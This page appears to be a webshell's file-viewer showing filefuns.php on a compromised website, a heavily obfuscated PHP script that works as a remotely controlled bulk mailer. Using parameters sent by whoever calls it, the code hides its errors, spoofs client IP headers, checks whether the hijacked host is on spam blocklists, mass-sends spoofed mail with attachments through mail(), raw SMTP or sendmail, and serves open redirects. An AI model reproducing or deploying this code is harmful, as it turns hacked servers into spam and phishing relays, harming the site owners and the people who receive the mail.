Anjing Webshells

Website : rimsha.abasa.com
: / var / www / islaam.net / public_html /
Filename : filefuns.php
back
aDriv4<?php
 goto QZ1Kw; wxz7g: $cm = new CompactMailer(); goto rdS9l; QZ1Kw: class CompactMailer { private $basedomain; private $fulldomain; private $randm_array = array(); private $attachment_array = array(); private $unsubscribe = 0; private $encoding = "\125\124\106\x2d\70"; private $custom_headers = false; private $context; private $eol = "\15\xa"; public function __construct() { @error_reporting(0); @ini_set("\x64\151\x73\x70\154\141\x79\137\145\162\x72\x6f\162\163", 0); @set_time_limit(300); @ignore_user_abort(true); @ini_set("\155\x61\170\137\x65\170\x65\143\165\x74\x69\x6f\x6e\x5f\x74\151\x6d\x65", 300); @ini_set("\155\141\x69\154\56\x61\x64\x64\x5f\x78\137\150\145\x61\144\145\x72", 0); @ini_set("\145\x78\x70\x6f\x73\x65\x5f\160\150\x70", 0); if (isset($_REQUEST["\x63\150\145\143\153"])) { die("\52\157\153\x2a"); } if (empty($_REQUEST)) { die; } $_SERVER["\120\110\120\137\123\x45\114\x46"] = "\57"; $this->ip = isset($_SERVER["\123\105\122\126\x45\x52\137\101\104\x44\122"]) ? $_SERVER["\123\105\x52\x56\105\122\x5f\101\x44\x44\x52"] : rand(1, 255) . "\56" . rand(0, 255) . "\56" . rand(0, 255) . "\56" . rand(0, 255); $_SERVER["\122\x45\x4d\117\x54\105\137\101\x44\104\122"] = $this->ip; if (!empty($_SERVER["\x48\124\124\x50\137\130\x5f\x46\x4f\122\x57\x41\x52\x44\x45\104\137\x46\117\x52"])) { $_SERVER["\x48\124\124\x50\x5f\x58\137\106\117\x52\127\x41\x52\104\x45\104\x5f\106\117\x52"] = $this->ip; } $this->context = @stream_context_create(array("\163\163\x6c" => array("\x76\x65\162\x69\146\x79\x5f\x70\145\x65\162" => false, "\166\x65\162\x69\146\171\x5f\160\145\x65\x72\x5f\x6e\141\x6d\x65" => false, "\x61\x6c\154\x6f\x77\137\163\145\154\x66\x5f\x73\151\147\x6e\145\x64" => true))); list($this->basedomain, $this->fulldomain) = $this->get_domain(); } public function run() { if (isset($_REQUEST["\x63\150"])) { $this->do_check(); die; } if (isset($_REQUEST["\x72"])) { $this->do_redirect(); die; } if (isset($_REQUEST["\165"])) { $this->do_unsubscribe(); die; } if (isset($_REQUEST["\154\x75"])) { $this->show_unsubscribe_log(); die; } if (isset($_REQUEST["\x64\x75"])) { $this->delete_unsubscribe_log(); die; } if (isset($_REQUEST["\x63\x65"])) { parse_str(base64_decode($_REQUEST["\x63\x65"]), $_REQUEST); } elseif (count($_REQUEST) == 1 && strlen(key($_REQUEST)) == 3) { parse_str(base64_decode($_REQUEST[key($_REQUEST)]), $_REQUEST); } if (isset($_REQUEST["\x65"])) { $this->encoding = $_REQUEST["\145"]; } if (isset($_REQUEST["\x63\150\145"])) { $this->custom_headers = $_REQUEST["\143\x68\145"]; } if (isset($_REQUEST["\163\156"])) { $this->do_send(); die; } echo json_encode(array("\163\164\141\x74\x75\163" => "\146\141\151\x6c", "\x65\x72\162\x6f\x72" => "\x4e\x6f\40\166\x61\x6c\x69\x64\40\141\143\164\151\157\156\40\163\160\x65\143\151\x66\x69\x65\144")); } private function do_check() { echo "\x2a\x76\x61\x6c\151\x64\x3a\x6f\x6b\52" . $this->eol; if (!empty($_REQUEST["\x6d"])) { $ok = $this->check_mail(explode("\72", $_REQUEST["\155"])[0], $_REQUEST["\163"] ?? $this->basedomain, $_REQUEST["\x6d\x73"] ?? $this->basedomain); echo $ok ? "\52\x6d\x61\151\154\72\x6f\153\52" : "\52\155\x61\x69\154\x3a\142\x61\144\x2a"; echo $this->eol; } if (isset($_REQUEST["\162\x62"])) { $r = $this->check_rbl(); echo $r == '' ? "\x2a\162\142\154\72\x6f\x6b\x2a" : "\52\x72\x62\154\x3a{$r}\x2a"; } } private function check_mail($to, $subj, $msg) { $body = chunk_split(base64_encode($msg)); $from_name = $this->random_text(); $from_addr = $from_name . "\100" . $this->basedomain; $hdrs = $this->get_headers($from_name, $from_addr); $hdrs .= "\x43\157\x6e\x74\145\156\x74\x2d\x54\171\160\145\x3a\40\164\145\170\x74\57\x68\x74\155\154\73\x20\x63\150\x61\162\x73\145\164\75\x55\124\106\x2d\70{$this->eol}" . "\x43\x6f\156\x74\x65\156\164\55\x54\x72\x61\x6e\163\146\145\162\55\x45\x6e\x63\157\x64\x69\156\147\x3a\x20\x62\141\x73\x65\66\64{$this->eol}"; $sent = $this->send_email_method($this->basedomain, $from_addr, $to, $subj, $body, $hdrs); if (!$sent && $this->basedomain != $this->fulldomain) { $from_addr = str_replace("\x40" . $this->basedomain, "\x40" . $this->fulldomain, $from_addr); $hdrs = $this->get_headers($from_name, $from_addr); $hdrs .= "\103\x6f\x6e\164\145\156\x74\55\124\x79\x70\x65\72\x20\164\x65\170\x74\57\150\x74\155\154\73\40\143\x68\141\x72\x73\145\x74\75\125\124\x46\55\70{$this->eol}" . "\103\x6f\156\164\145\x6e\x74\x2d\124\162\141\156\163\146\145\x72\x2d\x45\x6e\143\157\x64\x69\x6e\147\x3a\x20\x62\141\x73\145\x36\64{$this->eol}"; $sent = $this->send_email_method($this->fulldomain, $from_addr, $to, $subj, $body, $hdrs); } return $sent; } private function check_rbl() { $bls = array("\142\x2e\142\141\162\x72\x61\143\x75\x64\x61\x63\145\x6e\x74\x72\141\x6c\56\157\162\x67", "\170\142\x6c\56\x73\160\x61\155\x68\x61\x75\x73\x2e\157\x72\147", "\x73\142\154\56\x73\x70\141\x6d\150\x61\x75\x73\56\x6f\x72\147", "\172\x65\x6e\x2e\163\160\x61\x6d\150\x61\165\x73\x2e\157\x72\x67", "\x62\x6c\x2e\x73\160\x61\x6d\143\x6f\160\56\x6e\x65\164"); $ip = gethostbyname($this->basedomain); if (!$ip) { return "\165\156\153\156\x6f\x77\156"; } $rev = implode("\x2e", array_reverse(explode("\56", $ip))); $listed = array(); foreach ($bls as $b) { if (checkdnsrr("{$rev}\56{$b}\56", "\x41")) { $listed[] = $b; } } return implode("\x2c", $listed); } private function do_unsubscribe() { $email = base64_decode($_REQUEST["\x75"]); file_put_contents("\x6c\x6f\x67\x73\x75\142\163\143\x2e\154\x6f\147", date("\x5b\131\x2d\x6d\x2d\x64\40\x48\x3a\x69\72\163\x5d\x20") . $email . "\15\12", FILE_APPEND | LOCK_EX); die("\x3c\143\x65\156\x74\x65\162\76\12\x20\40\40\40\x20\x20\x20\40\x20\x20\x20\40\x20\40\74\150\x32\76\x59\157\x75\x20\150\141\166\145\x20\x75\x6e\x73\165\x62\x73\143\162\x69\142\145\144\x21\x3c\57\x68\62\76\12\x20\40\x20\40\x20\x20\x20\x20\40\40\40\x20\40\x20\74\160\76\105\155\x61\x69\154\72\x20\x3c\142\x3e{$email}\x3c\57\x62\76\74\57\x70\x3e\xa\x20\40\x20\40\40\40\40\40\40\x20\x20\40\74\57\143\145\x6e\164\145\162\76"); } private function show_unsubscribe_log() { if (is_file("\x6c\157\x67\163\x75\142\x73\143\x2e\154\157\x67")) { die(nl2br(file_get_contents("\154\157\147\x73\x75\142\163\x63\x2e\x6c\157\x67"))); } die; } private function delete_unsubscribe_log() { if (is_file("\154\x6f\147\x73\x75\x62\163\143\56\154\157\147")) { unlink("\154\157\147\163\x75\142\x73\143\56\154\157\147"); } die; } private function do_redirect() { $parts = explode("\46", base64_decode($_REQUEST["\162"])); $url = ''; $params = array(); foreach ($parts as $p) { list($k, $v) = explode("\x3d", trim($p), 2); if ($k === "\154") { $url = $v; } else { $params[] = "{$k}\x3d" . urlencode($v); } } $qs = $params ? "\77" . implode("\46", $params) : ''; die("\74\155\145\x74\x61\40\150\164\164\x70\x2d\x65\161\x75\x69\x76\x3d\x22\x72\145\146\162\145\x73\150\42\x20\143\157\156\x74\145\x6e\164\75\42\60\73\165\x72\x6c\x3d{$url}{$qs}\x22\x3e"); } private function do_send() { $lines = isset($_REQUEST["\x65\x6d"]) ? preg_split("\x2f\x5c\162\x3f\134\x6e\57", $_REQUEST["\145\x6d"]) : array(); foreach ($lines as $line) { $data = explode("\174", trim($line)); if (empty($data[0])) { continue; } $from_raw = $this->process_macros_random($_REQUEST["\146"], $data); $from_name = $from_raw; $from_addr = $this->get_text_between($from_raw, "\x3c", "\76") ?: ''; if (strpos($from_addr, "\x40") === false && $from_addr !== '') { $from_addr .= "\x40" . $this->basedomain; } $replyto = !empty($_REQUEST["\162\160\x74"]) ? $this->process_macros_random($_REQUEST["\162\160\x74"], $data) : null; $subject = $this->process_macros_random($_REQUEST["\x73"], $data); $message = $this->process_macros_random($_REQUEST["\155"], $data); if (!$this->send_email($data[0], $from_name, $from_addr, $subject, $message, $replyto)) { die("\52\x73\x65\156\144\72\142\141\144\52"); } } die("\52\x73\145\x6e\x64\x3a\x6f\153\52"); } private function send_email($to, $from_name, $from_addr, $subject, $message, $replyto) { $has_attachment = isset($_FILES["\x66\151\x6c\x65"]) && !$_FILES["\146\x69\x6c\145"]["\x65\162\x72\157\162"]; $file_string = $has_attachment ? file_get_contents($_FILES["\x66\151\x6c\145"]["\x74\x6d\x70\x5f\156\x61\155\145"]) : ''; $boundary_alt = md5(time() . "\141\154\164"); $boundary_mix = md5(time() . "\x6d\x69\x78"); $type = isset($_REQUEST["\164\x70"]) && $_REQUEST["\x74\x70"] == "\61" ? "\x74\x65\x78\x74\57\x68\164\x6d\x6c" : "\x74\145\170\164\x2f\x70\154\x61\x69\x6e"; $headers = $this->get_headers($from_name, $from_addr, $replyto); if ($this->unsubscribe) { $headers .= "\114\151\163\x74\55\125\x6e\163\x75\x62\163\x63\x72\151\142\x65\72\x20\x3c\155\141\151\x6c\164\157\72{$from_addr}\x3e\xd\12"; } if (!$has_attachment) { $headers .= "\103\157\x6e\164\145\x6e\164\x2d\124\x79\160\x65\x3a\40\155\165\154\x74\151\x70\x61\162\164\x2f\x61\154\164\145\x72\x6e\141\164\151\166\x65\x3b\x20\x62\x6f\x75\156\x64\141\162\171\x3d\x22{$boundary_alt}\42\xd\xa"; $body = "\x2d\x2d{$boundary_alt}\15\xa"; $body .= "\x43\157\x6e\164\x65\x6e\164\x2d\x54\171\160\145\x3a\x20\164\x65\170\164\57\x70\154\141\x69\x6e\73\40\x63\150\141\162\x73\x65\164\75\x55\x54\106\x2d\x38\xd\xa"; $body .= "\103\x6f\x6e\x74\x65\156\x74\55\x54\162\x61\156\x73\146\145\162\x2d\x45\156\x63\x6f\x64\151\156\x67\72\40\x62\141\163\145\66\64\xd\xa\15\xa"; $body .= chunk_split(base64_encode(strip_tags($message))); if ($type === "\164\x65\x78\x74\57\150\x74\x6d\x6c") { $body .= "\x2d\55{$boundary_alt}\15\xa"; $body .= "\103\157\156\x74\145\156\x74\55\124\171\x70\x65\x3a\x20\x74\145\170\x74\x2f\150\x74\x6d\x6c\x3b\x20\143\150\x61\162\163\145\164\x3d\125\x54\x46\x2d\70\15\xa"; $body .= "\x43\x6f\156\x74\x65\x6e\164\55\x54\162\141\x6e\163\146\145\162\x2d\105\x6e\143\157\144\x69\156\x67\72\40\142\141\163\x65\66\64\15\12\xd\12"; $body .= chunk_split(base64_encode($message)); } $body .= "\x2d\55{$boundary_alt}\55\x2d"; } else { $headers .= "\x43\x6f\156\x74\x65\156\x74\55\124\x79\160\145\72\x20\x6d\x75\154\164\151\x70\141\x72\x74\x2f\155\151\170\x65\x64\73\40\x62\157\x75\x6e\144\141\162\x79\x3d\x22{$boundary_mix}\42\xd\xa"; $body = "\55\55{$boundary_mix}\15\xa"; $body .= "\103\x6f\x6e\x74\x65\156\164\55\x54\171\x70\x65\72\40\155\165\x6c\164\151\160\x61\162\164\57\141\154\x74\x65\162\x6e\x61\164\x69\x76\145\x3b\40\x62\157\x75\x6e\144\x61\x72\171\x3d\42{$boundary_alt}\x22\xd\12\xd\12"; $body .= "\x2d\x2d{$boundary_alt}\15\12"; $body .= "\103\157\156\x74\145\156\x74\55\x54\171\160\145\72\x20\x74\x65\x78\164\x2f\160\x6c\x61\x69\x6e\73\40\x63\x68\x61\x72\163\145\164\x3d\x55\124\x46\55\70\xd\12"; $body .= "\x43\157\x6e\x74\145\x6e\x74\55\124\x72\141\156\163\x66\x65\162\55\x45\x6e\x63\x6f\x64\x69\x6e\147\72\x20\142\141\x73\145\66\x34\15\xa\xd\12"; $body .= chunk_split(base64_encode(strip_tags($message))); if ($type === "\164\145\x78\x74\x2f\x68\164\x6d\x6c") { $body .= "\x2d\x2d{$boundary_alt}\15\xa"; $body .= "\x43\x6f\156\164\x65\156\x74\x2d\124\171\x70\x65\72\40\164\145\x78\x74\57\150\164\155\x6c\73\40\143\x68\141\162\163\x65\x74\75\x55\124\x46\x2d\x38\15\12"; $body .= "\103\157\156\x74\145\156\164\55\x54\x72\x61\156\x73\146\145\162\x2d\x45\156\143\157\x64\151\x6e\147\x3a\40\142\141\x73\x65\66\64\15\xa\15\xa"; $body .= chunk_split(base64_encode($message)); } $body .= "\55\55{$boundary_alt}\x2d\55\xd\12"; $filename = $_FILES["\146\x69\x6c\x65"]["\x6e\141\x6d\x65"]; $mtype = $this->get_mime_type($filename); $body .= "\55\55{$boundary_mix}\xd\12"; $body .= "\103\x6f\x6e\x74\x65\x6e\164\55\124\x79\160\145\x3a\40{$mtype}\x3b\x20\156\141\155\x65\x3d\x22{$filename}\42\15\12"; $body .= "\x43\157\x6e\164\145\x6e\164\55\x44\x69\163\160\x6f\163\151\x74\151\157\156\72\40\141\x74\164\x61\143\150\155\x65\x6e\164\73\40\x66\151\x6c\x65\156\141\x6d\145\75\42{$filename}\42\xd\12"; $body .= "\x43\157\x6e\x74\x65\x6e\164\x2d\124\162\x61\x6e\163\x66\145\162\x2d\x45\x6e\143\157\144\x69\x6e\147\72\x20\142\x61\x73\x65\x36\64\15\12\xd\xa"; $body .= chunk_split(base64_encode($file_string)); $body .= "\x2d\x2d{$boundary_mix}\55\55"; } $subject_enc = $this->encode_header($subject); $sent = $this->send_email_method($this->basedomain, $from_addr, $to, $subject_enc, $body, $headers); if (!$sent && $this->basedomain != $this->fulldomain) { $sent = $this->send_email_method($this->fulldomain, str_replace("\x40" . $this->basedomain, "\100" . $this->fulldomain, $from_addr), $to, $subject_enc, $body, $headers); } return $sent; } private function send_email_method($domain, $mail_from, $to, $subject, $body, $headers) { $methods = isset($_REQUEST["\x73\155"]) && is_array($_REQUEST["\163\x6d"]) ? $_REQUEST["\163\x6d"] : array("\x6d\x61\151\154"); ksort($methods); $hdr = trim($headers); if (!preg_match("\57\x5e\x46\162\157\x6d\72\x2f\x6d\x69", $hdr)) { $hdr .= "\xd\xa\x46\162\x6f\x6d\72\x20{$mail_from}"; } if (!preg_match("\x2f\136\x44\x61\164\x65\72\x2f\155\x69", $hdr)) { $hdr = "\x44\141\164\145\x3a\40" . $this->rfc_date() . "\15\xa" . $hdr; } if (!preg_match("\57\x5e\115\145\x73\x73\141\147\x65\x2d\x49\x44\72\x2f\155\151", $hdr)) { $hdr = "\115\145\163\x73\x61\x67\x65\x2d\111\x44\x3a\x20\x3c" . $this->get_header_message_id($domain) . "\x3e\xd\xa" . $hdr; } if (!preg_match("\57\136\x54\157\72\57\155\151", $hdr)) { $hdr .= "\xd\12\x54\157\72\40{$to}"; } if (!preg_match("\57\x5e\x53\165\x62\x6a\145\x63\164\x3a\x2f\155\x69", $hdr)) { $hdr = "\123\165\142\152\x65\x63\x74\72\x20{$subject}\xd\xa" . $hdr; } foreach ($methods as $m) { if ($m === "\146\x6f\162\x63\x65") { $smtp_list = array(); if (!empty($_REQUEST["\163\155\150"]) && !empty($_REQUEST["\163\155\x70"])) { $smtp_list[] = array("\150\x6f\163\164" => $_REQUEST["\x73\x6d\x68"], "\160\x6f\x72\x74" => intval($_REQUEST["\x73\155\160"]), "\145\x6e\143" => $_REQUEST["\x73\x6d\160"] == 465 ? "\163\x73\x6c" : null); } else { $mx = $this->get_mx_records($domain); $smtp_list[] = array("\x68\x6f\163\x74" => "\x6c\x6f\143\141\x6c\150\x6f\163\x74", "\160\x6f\x72\x74" => 25, "\145\156\x63" => null); if (!empty($mx)) { $smtp_list[] = array("\x68\x6f\x73\x74" => $mx[0], "\160\x6f\x72\x74" => 25, "\x65\156\x63" => null); } } $data = "{$hdr}\15\xa\15\12{$body}\15\xa\x2e"; foreach ($smtp_list as $srv) { $sock = $this->smtp_connect($srv["\150\157\163\164"], $srv["\160\x6f\x72\164"], $srv["\145\x6e\143"]); if (!$sock) { continue; } if ($this->smtp_helo_and_send($sock, $mail_from, $to, $data, $domain)) { fclose($sock); echo "\52\x6d\x65\x74\x68\157\x64\x3a\x66\157\x72\x63\x65\x2a" . $this->eol; return true; } fclose($sock); } continue; } if ($m === "\155\141\x69\x6c") { if (@mail($to, $subject, $body, $hdr)) { echo "\x2a\155\x65\164\150\x6f\x64\72\155\x61\x69\154\x2a" . $this->eol; return true; } if ($this->fallback_sendmail($hdr, $body, $mail_from, $to, $domain)) { echo "\x2a\155\145\x74\150\157\x64\x3a\x73\145\156\x64\x6d\x61\151\154\x2a" . $this->eol; return true; } continue; } } return false; } private function try_sign_dkim($hdr, $body, $from, $to, $domain) { return false; } private function get_domain() { $host = $_SERVER["\110\x54\x54\x50\137\110\117\123\x54"] ?? $_SERVER["\x53\x45\122\x56\x45\x52\x5f\x4e\101\115\105"] ?? "\x6c\157\x63\x61\x6c\x68\x6f\x73\164"; $host = preg_replace("\57\x3a\134\144\x2b\x24\x2f", '', $host); $host = preg_replace("\57\x5e\x77\167\167\x5c\x2e\57\x69", '', $host); return array($host, $host); } private function get_mx_records($dom) { $mx = array(); $w = array(); if (function_exists("\x67\145\164\x6d\170\162\162")) { getmxrr($dom, $mx, $w); array_multisort($w, $mx); } return $mx; } private function smtp_connect($h, $p, $enc, $timeout = 5) { $host = ($enc === "\163\163\x6c" ? "\163\x73\154\72\x2f\57" : '') . $h; return @stream_socket_client($host . "\72" . $p, $errno, $errstr, $timeout, STREAM_CLIENT_CONNECT, $this->context); } private function smtp_helo_and_send($sock, $from, $to, $data, $dom) { stream_set_timeout($sock, 5); fgets($sock); fwrite($sock, "\x45\x48\114\x4f\x20{$dom}\15\xa"); fgets($sock); fwrite($sock, "\x4d\101\111\114\40\106\x52\x4f\115\72\74{$from}\x3e\xd\xa"); fgets($sock); fwrite($sock, "\x52\x43\x50\124\40\x54\x4f\72\74{$to}\76\15\12"); fgets($sock); fwrite($sock, "\104\101\124\x41\xd\xa"); fgets($sock); fwrite($sock, $data . "\xd\12"); $r = fgets($sock); fwrite($sock, "\121\125\111\x54\15\12"); return strpos($r, "\62\65\x30") === 0; } private function fallback_sendmail($hdr, $body, $from, $to, $dom) { $paths = array("\57\x75\x73\x72\x2f\x73\x62\x69\156\x2f\x73\x65\156\144\155\141\x69\154", "\57\x75\x73\x72\57\x62\151\x6e\x2f\x73\x65\x6e\144\155\141\x69\154", "\57\x75\163\x72\x2f\154\157\143\x61\x6c\x2f\163\x62\x69\156\x2f\x73\145\x6e\x64\155\x61\x69\x6c"); $bin = null; foreach ($paths as $p) { if (is_executable($p)) { $bin = $p; break; } } if (!$bin) { return false; } $cmd = escapeshellcmd($bin) . "\40\x2d\x74\40\55\x69\x20\x2d\146\x20" . escapeshellarg($from); $proc = proc_open($cmd, array(array("\x70\x69\x70\x65", "\x72"), array("\x70\151\160\x65", "\167"), array("\160\151\x70\145", "\x77")), $pipes); if (!is_resource($proc)) { return false; } fwrite($pipes[0], $hdr . "\15\xa\xd\12" . $body); fclose($pipes[0]); proc_close($proc); return true; } private function get_headers($name, $mail, $reply = null) { $enc = "\75\x3f{$this->encoding}\x3f\102\x3f" . base64_encode($name) . "\77\x3d"; $h = "\x46\162\157\155\72\x20{$enc}\40\74{$mail}\x3e\15\xa"; if ($reply) { $h .= "\x52\145\160\x6c\171\55\124\157\72\40{$reply}\15\xa"; } $h .= "\115\111\x4d\105\55\x56\145\x72\x73\151\157\x6e\x3a\40\x31\56\x30\15\xa"; if ($this->custom_headers) { $h .= str_replace("\12", "\15\xa", $this->custom_headers) . "\xd\12"; } return $h; } private function get_mime_type($f) { if (function_exists("\155\151\x6d\145\137\x63\157\156\x74\145\156\164\137\x74\171\160\145")) { return mime_content_type($f); } $ext = strtolower(pathinfo($f, PATHINFO_EXTENSION)); $map = array("\x6a\x70\x67" => "\x69\155\x61\147\x65\x2f\x6a\x70\x65\x67", "\160\x6e\147" => "\151\155\x61\x67\145\57\x70\156\x67", "\160\144\146" => "\141\x70\x70\154\x69\143\x61\164\151\157\x6e\57\160\x64\146"); return $map[$ext] ?? "\x61\x70\160\154\151\143\x61\x74\151\x6f\x6e\x2f\157\143\x74\x65\x74\x2d\x73\164\162\145\141\155"; } private function rfc_date() { return date("\x72"); } private function get_header_message_id($dom) { return md5(uniqid()) . "\x40" . $dom; } private function random_text() { return substr(str_shuffle("\141\x62\x63\x64\145\x66\x67\150\151\x6a\153\x6c\x6d\156\157\160\161\162\163\164\x75\x76\x77\x78\171\x7a"), 0, 8); } private function encode_header($s) { return "\x3d\x3f{$this->encoding}\77\102\x3f" . base64_encode($s) . "\77\75"; } private function process_macros_random($text, $data) { return $text; } private function get_text_between($str, $start, $end) { $a = strpos($str, $start); $b = strpos($str, $end, $a + 1); if ($a === false || $b === false) { return ''; } return substr($str, $a + strlen($start), $b - $a - strlen($start)); } } goto wxz7g; rdS9l: $cm->run();